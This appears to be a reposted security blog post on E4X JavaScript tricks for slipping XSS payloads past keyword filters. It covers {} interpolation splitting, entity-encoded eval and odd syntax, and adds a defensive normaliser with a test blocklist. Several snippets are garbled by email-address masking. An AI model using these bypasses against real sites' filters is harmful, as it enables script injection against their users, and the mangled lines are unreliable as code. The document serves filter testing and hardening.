If you’ve not been following my sla.ckers thread on unusual javascript <http://sla.ckers.org/forum/read.php?2,15812> then you’re missing out. My idea was to gather interesting, weird and wonderful JavaScript tricks that are useful for filter evasion and coding. I investigated E4X quite a lot for this purpose and found a few cool things that I’ll share with you.
Using {} for keyword evasion
Let’s say a filter disallows certain words. Inside an E4X literal, {} embeds
the string value of a JavaScript expression, so a block whose value converts
to the empty string can be dropped into the middle of a blocked word: the
filter sees the word split in two, but when the literal is converted to a
string (here by assigning it to location) the pieces join back up. new Array
creates an empty array, and an empty array converts to the empty string when
it is concatenated, so the block contributes nothing to the resulting text.
location=<text>javascr{new Array}ipt:aler{new Array}t(1)</text>
Another example:-
location=<text>javascr{[]}ipt:aler{[]}t(1)</text>
Weird syntax fun
E4X also adds syntax that would normally be a parse error in plain JavaScript
but is perfectly valid once E4X is enabled. The right-hand side of a default
xml namespace declaration is an ordinary expression and gets evaluated, so
the statement below runs alert(1):
default xml namespace = alert(1)
Some more weird looking stuff:-
<>{eval(/alert(1)/[-1])}</|>>[EMAIL PROTECTED]::xyz
([EMAIL PROTECTED]::abc?alert:[EMAIL PROTECTED]::xyz)(1)
Numbers as E4X
For some reason numbers can be used as XML
[EMAIL PROTECTED]/(are=1)%1..*::xml
Encoding with entities
Giorgio <http://hackademix.net/> brought this to my attention when he was
hacking my unsuccessful Firefox sandbox experiment. You can use entities
(the predefined XML ones such as &quot; and numeric character references)
and they are decoded when the XML data is used as a string:
alert(<>&quot;</>)
A more interesting example with decimal entities. eval only evaluates
strings, so the +[] is there to convert the XML to a string, and that
conversion is the step that resolves the entities:-
eval(<>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;</>+[])
Hackvertor supports morphs which allow you to generate this sort of data
automatically, useful for fuzzing XSS filters:-
E4X morph
<http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PEBlNHhfZGVjX21vcnBoX2Z1bGxfMz5hbGVydCgxKTxAL2U0eF9kZWNfbW9ycGhfZnVsbF8zPg%3D%3D>
(the base64 in that link decodes to the Hackvertor input <@e4x_dec_morph_full_3>alert(1)<@/e4x_dec_morph_full_3>)
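From the filter’s side, the two tricks above (an interpolation that stringifies to nothing, and entities that are only resolved once the literal is converted) both mean that the string the filter inspects is not the string the browser ends up running. The following is an added example, not code from the original post or from Hackvertor: it runs a naive keyword blocklist over constructed payloads, then applies the same blocklist after normalising the way E4X would. Rather than enumerate expressions that evaluate to "" (the attacker can always find another one), the normaliser drops every {…} interpolation and then resolves the five predefined XML entities and numeric character references. Function names, the blocklist and the payloads are my own, and nothing here needs E4X to run.

```javascript
// Added example (not from the original post): a keyword blocklist as the
// attacker meets it, and a normaliser that undoes the two E4X tricks above
// before the same blocklist is applied. Blocklist and payloads are constructed.

const BLOCKED = ['javascript:', 'alert', 'eval('];

// Naive filter: looks for the keywords literally. Returns true when allowed.
function naiveFilter(input) {
  const s = input.toLowerCase();
  return !BLOCKED.some((kw) => s.includes(kw));
}

// Drop every balanced {...} group. An E4X literal embeds the string value of
// the expression inside the braces, and the attacker picks that expression,
// so for matching purposes assume it contributes nothing and the text on
// either side joins up. Depth is tracked so a block that itself contains
// braces, e.g. {(function(){return ''})()}, is removed as one unit.
function stripInterpolations(s) {
  let out = '';
  let depth = 0;
  for (const ch of s) {
    if (ch === '{') { depth += 1; continue; }
    if (ch === '}' && depth > 0) { depth -= 1; continue; }
    if (depth === 0) out += ch;
  }
  return out;
}

// Resolve the five predefined XML entities and numeric character references
// (decimal &#NN; and hex &#xHH;); anything unrecognised is left untouched.
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (match, body) => {
    if (body[0] !== '#') {
      const name = body.toLowerCase();
      return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : match;
    }
    const hex = body[1] === 'x' || body[1] === 'X';
    const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : match; // NaN falls through
  });
}

// What the browser would end up with: text joined across interpolations,
// then entities resolved.
function normalizeE4X(input) {
  return decodeEntities(stripInterpolations(input));
}

// Hardened check: the blocklist must pass on the raw input and on its
// normalised form.
function hardenedFilter(input) {
  return naiveFilter(input) && naiveFilter(normalizeE4X(input));
}

// Constructed payloads: the {} evasions from the post, the entity trick moved
// into a location= literal so that no blocked word appears verbatim, and a
// benign E4X literal that must still pass.
const PAYLOADS = {
  newArray: 'location=<text>javascr{new Array}ipt:aler{new Array}t(1)</text>',
  emptyArray: 'location=<text>javascr{[]}ipt:aler{[]}t(1)</text>',
  decimal: 'location=<text>&#106;avascript:&#97;lert(1)</text>',
  hexMixed: 'location=<text>&#x6A;avascr{[]}ipt:&#x61;lert(1)</text>',
  benign: '<p>{user.name} said hello &amp; goodbye</p>',
};

// Returns {name: {naive, hardened}} so the two verdicts can be compared.
function runDemo() {
  const report = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    report[name] = { naive: naiveFilter(payload), hardened: hardenedFilter(payload) };
  }
  return report;
}

console.table(runDemo());
```

Every attack payload passes naiveFilter and fails hardenedFilter, while the benign literal passes both. Normalising before matching closes the two bypasses on this page, but a blocklist stays a blocklist: the durable fix is not to let untrusted input reach a JavaScript or E4X context at all.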
Form creation
Making forms with E4X is lovely, check it out:-
f=<form/>;                          // XML literal; f is an E4X XML object
f.@id='x';                          // .@name reads or writes an attribute
f.@action='url.php';
f.@method='post';
[EMAIL PROTECTED]'h'
[EMAIL PROTECTED];
document.body.innerHTML=f;          // the XML object converts to its markup string
document.getElementById('x').submit();
[Ph4nt0m] <http://www.ph4nt0m.org/>
[Ph4nt0m Security Team] <http://blog.ph4nt0m.org/>
--~--~---------~--~----~------------~-------~--~----~
To post to this mailing list, send mail to [email protected]
To unsubscribe, send mail to [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---

